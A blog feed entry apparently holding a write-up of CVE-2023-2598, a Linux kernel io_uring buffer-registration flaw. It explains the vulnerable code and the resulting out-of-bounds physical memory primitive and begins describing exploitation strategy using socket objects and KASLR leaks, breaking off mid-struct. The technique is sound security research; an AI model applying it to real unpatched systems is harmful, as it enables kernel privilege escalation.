<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="/feed.xml" rel="self" type="application/atom+xml" /><link href="/" rel="alternate" type="text/html" /><updated>2026-03-14T09:35:09+00:00</updated><id>/feed.xml</id><title type="html">a place of anatomical precision</title><subtitle>A true place of anatomical precision. Yordan Stoychev&apos;s blog.</subtitle><entry><title type="html">Conquering the memory through io_uring - Analysis of CVE-2023-2598</title><link href="/cve-2023-2598/" rel="alternate" type="text/html" title="Conquering the memory through io_uring - Analysis of CVE-2023-2598" /><published>2023-11-17T14:00:00+00:00</published><updated>2023-11-17T14:00:00+00:00</updated><id>/cve-2023-2598</id><content type="html" xml:base="/cve-2023-2598/"><![CDATA[<p>Two months ago, I decided to look into the <a href="https://unixism.net/loti/what_is_io_uring.html">io_uring</a> subsystem of the Linux Kernel.</p>

<p>Eventually, I stumbled upon an <a href="https://www.openwall.com/lists/oss-security/2023/05/08/3">email</a> disclosing a vulnerability within io_uring. The email’s subject was <em>“Linux kernel io_uring out-of-bounds access to physical memory”</em>. It immediately piqued my interest.</p>

<p>I had to put my research on pause as preparation for this year’s European Cyber Security Challenge was sucking up most of my free time. Anyway, now that ECSC is over, I was able to look into it and decided to do a write-up of this powerful vulnerability.</p>

<h2 id="table-of-contents">Table of Contents</h2>
<ol>
  <li><a href="#io_uring_intro">The io_uring subsystem in a nutshell</a>
    <ul>
      <li><a href="#io_uring">What is io_uring?</a></li>
      <li><a href="#queues">Submission and Completion Queues</a></li>
      <li><a href="#buffers">Buffers</a></li>
      <li><a href="#liburing">liburing</a></li>
    </ul>
  </li>
  <li><a href="#vulnerability">Vulnerability</a>
    <ul>
      <li><a href="#rootcause">Root Cause</a>
        <ul>
          <li><a href="#folio">Understanding page folios</a></li>
        </ul>
      </li>
    </ul>
  </li>
  <li><a href="#exploitation">Exploitation</a>
    <ul>
      <li><a href="#primitive">An Incredible Primitive</a></li>
      <li><a href="#targetobjects">Target Objects</a>
        <ul>
          <li><a href="#sockets">Sockets</a></li>
          <li><a href="#twoeggs">Two Eggs</a></li>
          <li><a href="#idsockets">Identifying the sockets</a></li>
        </ul>
      </li>
      <li><a href="#kaslr">Leaking KASLR</a></li>
      <li><a href="#privesc">Privilege Escalation</a>
        <ul>
          <li><a href="#tcp_sock">Peeling back tcp_sock</a></li>
          <li><a href="#call_usermodehelper_exec">call_usermodehelper_exec</a></li>
          <li><a href="#overlap_subprocess_info">Overlapping subprocess_info</a></li>
          <li><a href="#arguments">Setting up the arguments</a></li>
          <li><a href="#subprocess_info">Setting up subprocess_info</a></li>
        </ul>
      </li>
      <li><a href="#poc">Proof of Concept</a></li>
    </ul>
  </li>
  <li><a href="#acknowledgements">Acknowledgements</a></li>
</ol>

<h2 id="the-io_uring-subsystem-in-a-nutshell-">The io_uring subsystem in a nutshell <a name="io_uring_intro"></a></h2>
<p>I will try to provide a very short and basic introduction to the <code class="language-plaintext highlighter-rouge">io_uring</code> subsystem and its most integral components.</p>

<p>I recommend reading <a href="https://twitter.com/chompie1337">Chompie’s</a> amazing <a href="https://chompie.rip/Blog+Posts/Put+an+io_uring+on+it+-+Exploiting+the+Linux+Kernel#io_uring+What+is+it%3F">introduction to the subsystem</a> if you want to get a more complete idea of how <code class="language-plaintext highlighter-rouge">io_uring</code> works.</p>

<h3 id="what-is-io_uring-">What is io_uring? <a name="io_uring"></a></h3>
<p>In a nutshell, <code class="language-plaintext highlighter-rouge">io_uring</code> is an API for Linux allowing applications to perform “system calls” asynchronously. It provides significant performance improvements over using normal syscalls. It allows your program to not wait on blocking syscalls and because of how it is implemented, lowers the number of actual syscalls needed to be performed.</p>

<h3 id="submission-and-completion-queues-">Submission and Completion Queues <a name="queues"></a></h3>
<p>At the core of every <code class="language-plaintext highlighter-rouge">io_uring</code> implementation sit two ring buffers - the submission queue (SQ) and the completion queue (CQ). Those ring buffers are shared between the application and the kernel.</p>

<p>In the submission queue are put <em>Submission Queue Entries (SQEs)</em>, each describing a syscall you want to be performed. The application then performs an <code class="language-plaintext highlighter-rouge">io_uring_enter</code> syscall to effectively tell the kernel that there is work waiting to be done in the submission queue.</p>
<blockquote>
  <p>It is even possible to set up submission queue polling that eliminates the need to use <code class="language-plaintext highlighter-rouge">io_uring_enter</code>, reducing the number of <em>real</em> syscalls needed to be performed to 0.</p>
</blockquote>

<p>After the kernel performs the operation it puts a <em>Completion Queue Entry (CQE)</em> into the completion queue ring buffer which can then be consumed by the application.</p>

<h3 id="fixed-buffers-">Fixed buffers <a name="buffers"></a></h3>
<p>You can register fixed buffers to be used by operations that read or write data. The pages that those buffers span will be <em><a href="https://eric-lo.gitbook.io/memory-mapped-io/pin-the-page">pinned</a></em> and mapped for use, avoiding future copies to and from user space.</p>

<p>Registration of buffers happens through the <code class="language-plaintext highlighter-rouge">io_uring_register</code> syscall with the <a href="https://manpages.debian.org/unstable/liburing-dev/io_uring_register.2.en.html#IORING_REGISTER_BUFFERS">IORING_REGISTER_BUFFERS</a> operation and the selection of buffers for use with the <a href="https://manpages.debian.org/unstable/liburing-dev/io_uring_enter.2.en.html#IOSQE_BUFFER_SELECT">IOSQE_BUFFER_SELECT</a> SQE flag.
For an example case of use, check <a href="https://unixism.net/loti/tutorial/fixed_buffers.html">this</a> out.</p>

<p>As <em>fixed buffers</em> are the protagonist of our story, we will see more of them later.</p>

<h3 id="liburing-">liburing <a name="liburing"></a></h3>
<p>Thankfully there is a library that provides helpers for setting up <code class="language-plaintext highlighter-rouge">io_uring</code> instances and interacting with the subsystem - <a href="https://github.com/axboe/liburing">liburing</a>. It makes easy, operations like setting up buffers, producing SQEs, collecting CQEs, and so on.</p>

<p>It provides a simplified interface to <code class="language-plaintext highlighter-rouge">io_uring</code> that developers (<em>including exploit developers</em>) can use to make their lives easier.</p>

<p>As <code class="language-plaintext highlighter-rouge">liburing</code> is maintained by Jens Axboe, the maintainer of <code class="language-plaintext highlighter-rouge">io_uring</code>, it can be relied upon to be up-to-date with the kernel-side changes.</p>

<h2 id="vulnerability-">Vulnerability <a name="vulnerability"></a></h2>
<blockquote>
  <p>A flaw was found in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) in the Linux kernel that allows out-of-bounds access to physical memory beyond the end of the buffer.</p>
</blockquote>

<p>The vulnerability was introduced in version 6.3-rc1 (commit <code class="language-plaintext highlighter-rouge">57bebf807e2a</code>) and was patched in 6.4-rc1 (commit <code class="language-plaintext highlighter-rouge">776617db78c6</code>).</p>

<h3 id="root-cause-">Root Cause <a name="rootcause"></a></h3>
<p>The root cause of the vulnerability is a faulty optimization when buffers are registered.</p>

<p>Buffers get registered through an <code class="language-plaintext highlighter-rouge">io_uring_register</code> system call by passing the <code class="language-plaintext highlighter-rouge">IORING_REGISTER_BUFFERS</code> opcode. This invokes <code class="language-plaintext highlighter-rouge">io_sqe_buffers_register</code>, which in return calls <code class="language-plaintext highlighter-rouge">io_sqe_buffer_register</code> to register each of the buffers. This is where the vulnerability arises.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* io_uring/rsrc.c */</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">io_sqe_buffer_register</span><span class="p">(</span><span class="k">struct</span> <span class="n">io_ring_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">iovec</span> <span class="o">*</span><span class="n">iov</span><span class="p">,</span>
				  <span class="k">struct</span> <span class="n">io_mapped_ubuf</span> <span class="o">**</span><span class="n">pimu</span><span class="p">,</span>
				  <span class="k">struct</span> <span class="n">page</span> <span class="o">**</span><span class="n">last_hpage</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">io_mapped_ubuf</span> <span class="o">*</span><span class="n">imu</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">page</span> <span class="o">**</span><span class="n">pages</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> <span class="c1">// important to remember: *struct page* refers to physical pages</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">off</span><span class="p">;</span>
	<span class="kt">size_t</span> <span class="n">size</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">ret</span><span class="p">,</span> <span class="n">nr_pages</span><span class="p">,</span> <span class="n">i</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">folio</span> <span class="o">*</span><span class="n">folio</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="o">*</span><span class="n">pimu</span> <span class="o">=</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">dummy_ubuf</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_base</span><span class="p">)</span> <span class="c1">// if base is NULL</span>
		<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

	<span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
	<span class="n">pages</span> <span class="o">=</span> <span class="n">io_pin_pages</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span> <span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_base</span><span class="p">,</span> <span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_len</span><span class="p">,</span>
				<span class="o">&amp;</span><span class="n">nr_pages</span><span class="p">);</span> <span class="c1">// pins the pages that the iov occupies</span>
	<span class="c1">// returns a pointer to an array of *page* pointers </span>
	<span class="c1">// and sets nr_pages to the number of pinned pages</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">pages</span><span class="p">))</span> <span class="p">{</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="n">PTR_ERR</span><span class="p">(</span><span class="n">pages</span><span class="p">);</span>
		<span class="n">pages</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>
    <span class="p">...</span>
</code></pre></div></div>
<p>Let’s first make clear what our “building blocks” are and what they are used for.</p>

<p>To this function are passed four arguments - the context, an <code class="language-plaintext highlighter-rouge">iovec</code> pointer, an <code class="language-plaintext highlighter-rouge">io_mapped_ubuf</code> pointer and a pointer to <code class="language-plaintext highlighter-rouge">last_hpage</code> (this value is always <code class="language-plaintext highlighter-rouge">NULL</code>).</p>

<p>An <code class="language-plaintext highlighter-rouge">iovec</code> is just a structure that describes a buffer, with the start address of the buffer and its length. Nothing more.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">iovec</span>
<span class="p">{</span>
	<span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">iov_base</span><span class="p">;</span>	<span class="c1">// the address at which the buffer starts</span>
	<span class="n">__kernel_size_t</span> <span class="n">iov_len</span><span class="p">;</span> <span class="c1">// the length of the buffer in bytes</span>
<span class="p">};</span>
</code></pre></div></div>
<p>When we pass a buffer to be registered we pass it as an <code class="language-plaintext highlighter-rouge">iovec</code>. Here the <code class="language-plaintext highlighter-rouge">*iov</code> pointer in this function points to a structure, containing information about the buffer that the user wants to register.</p>

<p>An <code class="language-plaintext highlighter-rouge">io_mapped_ubuf</code> is a structure that holds the information about a buffer that has been registered to an <code class="language-plaintext highlighter-rouge">io_uring</code> instance.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">io_mapped_ubuf</span> <span class="p">{</span>
	<span class="n">u64</span>		<span class="n">ubuf</span><span class="p">;</span> <span class="c1">// the address at which the buffer starts</span>
	<span class="n">u64</span>		<span class="n">ubuf_end</span><span class="p">;</span> <span class="c1">// the address at which it ends</span>
	<span class="kt">unsigned</span> <span class="kt">int</span>	<span class="n">nr_bvecs</span><span class="p">;</span> <span class="c1">// how many bio_vec(s) are needed to address the buffer </span>
	<span class="kt">unsigned</span> <span class="kt">long</span>	<span class="n">acct_pages</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">bio_vec</span>	<span class="n">bvec</span><span class="p">[];</span> <span class="c1">// array of bio_vec(s)</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The last member of <code class="language-plaintext highlighter-rouge">io_mapped_buf</code> is an array of <code class="language-plaintext highlighter-rouge">bio_vec(s)</code>. A <code class="language-plaintext highlighter-rouge">bio_vec</code> is kind of like an <code class="language-plaintext highlighter-rouge">iovec</code> but for physical memory. It defines a contiguous range of physical memory addresses.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">bio_vec</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">page</span>	<span class="o">*</span><span class="n">bv_page</span><span class="p">;</span> <span class="c1">// the first page associated with the address range</span>
	<span class="kt">unsigned</span> <span class="kt">int</span>	<span class="n">bv_len</span><span class="p">;</span> <span class="c1">// length of the range (in bytes)</span>
	<span class="kt">unsigned</span> <span class="kt">int</span>	<span class="n">bv_offset</span><span class="p">;</span> <span class="c1">// start of the address range relative to the start of bv_page</span>
<span class="p">};</span>
</code></pre></div></div>
<p>And <code class="language-plaintext highlighter-rouge">struct page</code> is of course just a structure describing a physical page of memory.</p>

<p>In the code snippet above, the pages that the <code class="language-plaintext highlighter-rouge">iov</code> spans get pinned to memory ensuring they stay in the main memory and are exempt from paging. An array <code class="language-plaintext highlighter-rouge">pages</code> is returned that contains pointers to the <code class="language-plaintext highlighter-rouge">struct page(s)</code> that the <code class="language-plaintext highlighter-rouge">iov</code> spans and <code class="language-plaintext highlighter-rouge">nr_pages</code> gets set to the number of pages.</p>

<p>Let’s now continue with <code class="language-plaintext highlighter-rouge">io_sqe_buffer_register</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="p">...</span>
	<span class="cm">/* If it's a huge page, try to coalesce them into a single bvec entry */</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">nr_pages</span> <span class="o">&gt;</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// if more than one page</span>
		<span class="n">folio</span> <span class="o">=</span> <span class="n">page_folio</span><span class="p">(</span><span class="n">pages</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="c1">// converts from page to folio</span>
		<span class="c1">// returns the folio that contains this page</span>
		<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">nr_pages</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">page_folio</span><span class="p">(</span><span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="o">!=</span> <span class="n">folio</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// different folios -&gt; not physically contiguous </span>
				<span class="n">folio</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> <span class="c1">// set folio to NULL as we cannot coalesce into a single entry</span>
				<span class="k">break</span><span class="p">;</span>
			<span class="p">}</span>
		<span class="p">}</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">folio</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// if all the pages are in the same folio</span>
			<span class="n">folio_put_refs</span><span class="p">(</span><span class="n">folio</span><span class="p">,</span> <span class="n">nr_pages</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span> 
			<span class="n">nr_pages</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// sets nr_pages to 1 as it can be represented as a single folio page</span>
		<span class="p">}</span>
	<span class="p">}</span>
    <span class="p">...</span>
</code></pre></div></div>
<p>Here if the <code class="language-plaintext highlighter-rouge">iov</code> spans more than a single physical page, the kernel will loop through <code class="language-plaintext highlighter-rouge">pages</code> to check if they belong to the same <code class="language-plaintext highlighter-rouge">folio</code>. But what even is <code class="language-plaintext highlighter-rouge">folio</code>?</p>

<h4 id="understanding-page-folios-">Understanding page folios <a name="folio"></a></h4>
<p>To understand what a <code class="language-plaintext highlighter-rouge">folio</code> is we need to first understand what a page really is <em>according to the kernel</em>. Usually by <em>a page</em> people mean the smallest block of physical memory which can be mapped by the kernel (most commonly 4096 bytes but might be larger). Well, that isn’t really what a <em>page</em> is in the context of the kernel. The definition has been expanded to include compound pages which are multiple contiguous <em>single</em> pages - which makes things confusing.</p>

<p>Compound pages have a “head page” that holds the information about the compound page and is marked to make clear the nature of the compound page. All the “tail pages” are marked as such and contain a pointer to the “head page”. But that creates a problematic ambiguity - if a <code class="language-plaintext highlighter-rouge">page</code> pointer for a tail page is passed to a function, is the function supposed to act on just that singular page or the whole compound page?</p>

<p>So to address this confusion the concept of “page folios” was introduced. A “page folio” is essentially a page that is <em>guaranteed</em> to <strong>not</strong> be a tail page. This clears out the ambiguity as functions meant to not operate on singular tail pages will take <code class="language-plaintext highlighter-rouge">struct *folio</code> as an argument instead of <code class="language-plaintext highlighter-rouge">struct *page</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">folio</span> <span class="p">{</span>
       <span class="k">struct</span> <span class="n">page</span> <span class="n">page</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">folio</code> structure is just a wrapper around <code class="language-plaintext highlighter-rouge">page</code>. It should be noted that every page is a part of a <code class="language-plaintext highlighter-rouge">folio</code>. Non-compound page’s “page folio” is the page itself. Now that we know what a page folio is we can dissect the code above.</p>

<p>The code above is meant to identify if the pages that the buffer being registered spans are part of a single compound page. It iterates through the pages and checks if their folio is the same. If so it sets the number of pages <code class="language-plaintext highlighter-rouge">nr_pages</code> to <code class="language-plaintext highlighter-rouge">1</code> and sets the <code class="language-plaintext highlighter-rouge">folio</code> variable. Now here comes the issue…</p>

<p>The code that checks if the pages are from the same folio doesn’t actually check if they are consecutive. It can be the same page mapped multiple times. During the iteration <code class="language-plaintext highlighter-rouge">page_folio(page)</code> would return the same folio again and again passing the checks. This is an obvious logic bug. Let’s continue with <code class="language-plaintext highlighter-rouge">io_sqe_buffer_register</code> and see what the fallout is.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="p">...</span>
	<span class="n">imu</span> <span class="o">=</span> <span class="n">kvmalloc</span><span class="p">(</span><span class="n">struct_size</span><span class="p">(</span><span class="n">imu</span><span class="p">,</span> <span class="n">bvec</span><span class="p">,</span> <span class="n">nr_pages</span><span class="p">),</span> <span class="n">GFP_KERNEL</span><span class="p">);</span> 
	<span class="c1">// allocates imu with an array for nr_pages bio_vec(s)</span>
	<span class="c1">// bio_vec - a contiguous range of physical memory addresses</span>
	<span class="c1">// we need a bio_vec for each (physical) page</span>
    <span class="c1">// in the case of a folio - the array of bio_vec(s) will be of size 1</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">imu</span><span class="p">)</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>

	<span class="n">ret</span> <span class="o">=</span> <span class="n">io_buffer_account_pin</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">pages</span><span class="p">,</span> <span class="n">nr_pages</span><span class="p">,</span> <span class="n">imu</span><span class="p">,</span> <span class="n">last_hpage</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">unpin_user_pages</span><span class="p">(</span><span class="n">pages</span><span class="p">,</span> <span class="n">nr_pages</span><span class="p">);</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="n">off</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span> <span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_base</span> <span class="o">&amp;</span> <span class="o">~</span><span class="n">PAGE_MASK</span><span class="p">;</span>
	<span class="n">size</span> <span class="o">=</span> <span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_len</span><span class="p">;</span> <span class="c1">// sets the size to that passed by the user!</span>
	<span class="cm">/* store original address for later verification */</span>
	<span class="n">imu</span><span class="o">-&gt;</span><span class="n">ubuf</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span> <span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_base</span><span class="p">;</span> <span class="c1">// user-controlled</span>
	<span class="n">imu</span><span class="o">-&gt;</span><span class="n">ubuf_end</span> <span class="o">=</span> <span class="n">imu</span><span class="o">-&gt;</span><span class="n">ubuf</span> <span class="o">+</span> <span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_len</span><span class="p">;</span> <span class="c1">// calculates the end based on the length</span>
	<span class="n">imu</span><span class="o">-&gt;</span><span class="n">nr_bvecs</span> <span class="o">=</span> <span class="n">nr_pages</span><span class="p">;</span> <span class="c1">// this would be 1 in the case of folio</span>
	<span class="o">*</span><span class="n">pimu</span> <span class="o">=</span> <span class="n">imu</span><span class="p">;</span>
	<span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">folio</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// in case of folio - we need just a single bio_vec (efficiant!)</span>
		<span class="n">bvec_set_page</span><span class="p">(</span><span class="o">&amp;</span><span class="n">imu</span><span class="o">-&gt;</span><span class="n">bvec</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">pages</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">size</span><span class="p">,</span> <span class="n">off</span><span class="p">);</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">nr_pages</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> 
		<span class="kt">size_t</span> <span class="n">vec_len</span><span class="p">;</span>

		<span class="n">vec_len</span> <span class="o">=</span> <span class="n">min_t</span><span class="p">(</span><span class="kt">size_t</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="n">off</span><span class="p">);</span>
		<span class="n">bvec_set_page</span><span class="p">(</span><span class="o">&amp;</span><span class="n">imu</span><span class="o">-&gt;</span><span class="n">bvec</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">vec_len</span><span class="p">,</span> <span class="n">off</span><span class="p">);</span>
		<span class="n">off</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
		<span class="n">size</span> <span class="o">-=</span> <span class="n">vec_len</span><span class="p">;</span>
	<span class="p">}</span>
<span class="n">done</span><span class="o">:</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">ret</span><span class="p">)</span>
		<span class="n">kvfree</span><span class="p">(</span><span class="n">imu</span><span class="p">);</span>
	<span class="n">kvfree</span><span class="p">(</span><span class="n">pages</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="err">}</span>
</code></pre></div></div>
<p>A single <code class="language-plaintext highlighter-rouge">bio_vec</code> is allocated as <code class="language-plaintext highlighter-rouge">nr_pages = 1</code>. The size of the buffer that is written in <code class="language-plaintext highlighter-rouge">pimu-&gt;iov_len</code> and <code class="language-plaintext highlighter-rouge">pimu-&gt;bvec[0].bv_len</code> is the one passed by the user in <code class="language-plaintext highlighter-rouge">iov-&gt;iov_len</code>.</p>

<h2 id="exploitation-">Exploitation <a name="exploitation"></a></h2>
<p>Now that our logic bug is clear let’s see how it can be exploited.</p>

<h3 id="an-incredible-primitive-">An Incredible Primitive <a name="primitive"></a></h3>
<p>Let’s now imagine that we are registering a buffer that spans multiple virtual pages but each of them is the same <em>page</em> mapped again and again. This buffer is virtually contiguous, as the virtual memory is contiguous, but it isn’t <em>physically</em> contiguous. When the buffer goes through the faulty code that checks if the pages belong to a compound page - it will pass them, fooling the kernel that it spans multiple pages as part of a compound page while in reality, it is just a single page.</p>

<p>This means that <code class="language-plaintext highlighter-rouge">pimu-&gt;bvec.bv_len</code> will be set to the <em>virtual</em> length of the buffer because the kernel believes that the virtually contiguous memory is backed by physically contiguous memory. As we established, <code class="language-plaintext highlighter-rouge">bio_vec(s)</code> deal with physical ranges of memory. This buffer will be registered and give us access to the physical pages following the one that was mapped to construct the buffer.</p>

<p>We can register a buffer spanning <code class="language-plaintext highlighter-rouge">n</code> virtual pages but a single physical one. After registering this buffer we can use <code class="language-plaintext highlighter-rouge">io_uring</code> operations to read from the buffer as well as write to it - giving us an out-of-bound access to <code class="language-plaintext highlighter-rouge">n-1</code> physical pages. Here <code class="language-plaintext highlighter-rouge">n</code> could be as high as the limit set for mappings allowed to a single userland process. We have a multi-page out-of-bounds read and write.</p>

<p>This is an incredibly powerful primitive, perhaps even the most powerful I have seen yet.</p>

<h3 id="target-objects-">Target Objects <a name="targetobjects"></a></h3>
<p>We are looking for target objects that allow us to leak KASLR and get some kind of code execution.</p>

<p>Thankfully as we have an OOB read and write to whole physical pages, we don’t have any limits on the objects themselves, we don’t care what slab they use, what their size is or anything like that.</p>

<p>We do however have <em>some</em> requirements. We need to be able to find our target objects and identify them. We will be leaking thousands of pages and we need to be able to find our needle(s) in the haystack. We need to be able to place an <a href="https://fuzzysecurity.com/tutorials/expDev/4.html">egg</a> in the object itself using which we can later identify the object.</p>

<h4 id="sockets-">Sockets <a name="sockets"></a></h4>
<p>Here sockets are our friend. They are pretty massive objects containing both user-controlled fields, which can be used to place an egg, as well as function pointers which can be used to leak KASLR.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">sock</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">sock_common</span>         <span class="n">__sk_common</span><span class="p">;</span>          <span class="cm">/*     0   136 */</span>
	<span class="cm">/* --- cacheline 2 boundary (128 bytes) was 8 bytes ago --- */</span>
	<span class="k">struct</span> <span class="n">dst_entry</span> <span class="o">*</span>         <span class="n">sk_rx_dst</span><span class="p">;</span>            <span class="cm">/*   136     8 */</span>
	<span class="kt">int</span>                        <span class="n">sk_rx_dst_ifindex</span><span class="p">;</span>    <span class="cm">/*   144     4 */</span>
	<span class="n">u32</span>                        <span class="n">sk_rx_dst_cookie</span><span class="p">;</span>     <span class="cm">/*   148     4 */</span>
	<span class="n">socket_lock_t</span>              <span class="n">sk_lock</span><span class="p">;</span>              <span class="cm">/*   152    32 */</span>
	<span class="n">atomic_t</span>                   <span class="n">sk_drops</span><span class="p">;</span>             <span class="cm">/*   184     4 */</span>
	<span class="kt">int</span>                        <span class="n">sk_rcvlowat</span><span class="p">;</span>          <span class="cm">/*   188     4 */</span>
	<span class="cm">/* --- cacheline 3 boundary (192 bytes) --- */</span>
	<span class="k">struct</span> <span class="n">sk_buff_head</span>        <span class="n">sk_error_queue</span><span class="p">;</span>       <span class="cm">/*   192    24 */</span>
	<span class="k">struct</span> <span class="n">sk_buff_head</span>        <span class="n">sk_receive_queue</span><span class="p">;</span>     <span class="cm">/*   216    24 */</span>
	<span class="k">struct</span> <span class="p">{</span>
		<span class="n">atomic_t</span>           <span class="n">rmem_alloc</span><span class="p">;</span>           <span class="cm">/*   240     4 */</span>
		<span class="kt">int</span>                <span class="n">len</span><span class="p">;</span>                  <span class="cm">/*   244     4 */</span>
		<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span>   <span class="n">head</span><span class="p">;</span>                 <span class="cm">/*   248     8 */</span>
		<span class="cm">/* --- cacheline 4 boundary (256 bytes) --- */</span>
		<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span>   <span class="n">tail</span><span class="p">;</span>                 <span class="cm">/*   256     8 */</span>
	<span class="p">}</span> <span class="n">sk_backlog</span><span class="p">;</span>                                    <span class="cm">/*   240    24 */</span>
	<span class="kt">int</span>                        <span class="n">sk_forward_alloc</span><span class="p">;</span>     <span class="cm">/*   264     4 */</span>
	<span class="n">u32</span>                        <span class="n">sk_reserved_mem</span><span class="p">;</span>      <span class="cm">/*   268     4 */</span>
	<span class="kt">unsigned</span> <span class="kt">int</span>               <span class="n">sk_ll_usec</span><span class="p">;</span>           <span class="cm">/*   272     4 */</span>
	<span class="kt">unsigned</span> <span class="kt">int</span>               <span class="n">sk_napi_id</span><span class="p">;</span>           <span class="cm">/*   276     4 */</span>
	<span class="kt">int</span>                        <span class="n">sk_rcvbuf</span><span class="p">;</span>            <span class="cm">/*   280     4 */</span>

	<span class="cm">/* XXX 4 bytes hole, try to pack */</span>

	<span class="k">struct</span> <span class="n">sk_filter</span> <span class="o">*</span>         <span class="n">sk_filter</span><span class="p">;</span>            <span class="cm">/*   288     8 */</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="k">struct</span> <span class="n">socket_wq</span> <span class="o">*</span> <span class="n">sk_wq</span><span class="p">;</span>                <span class="cm">/*   296     8 */</span>
		<span class="k">struct</span> <span class="n">socket_wq</span> <span class="o">*</span> <span class="n">sk_wq_raw</span><span class="p">;</span>            <span class="cm">/*   296     8 */</span>
	<span class="p">};</span>                                               <span class="cm">/*   296     8 */</span>
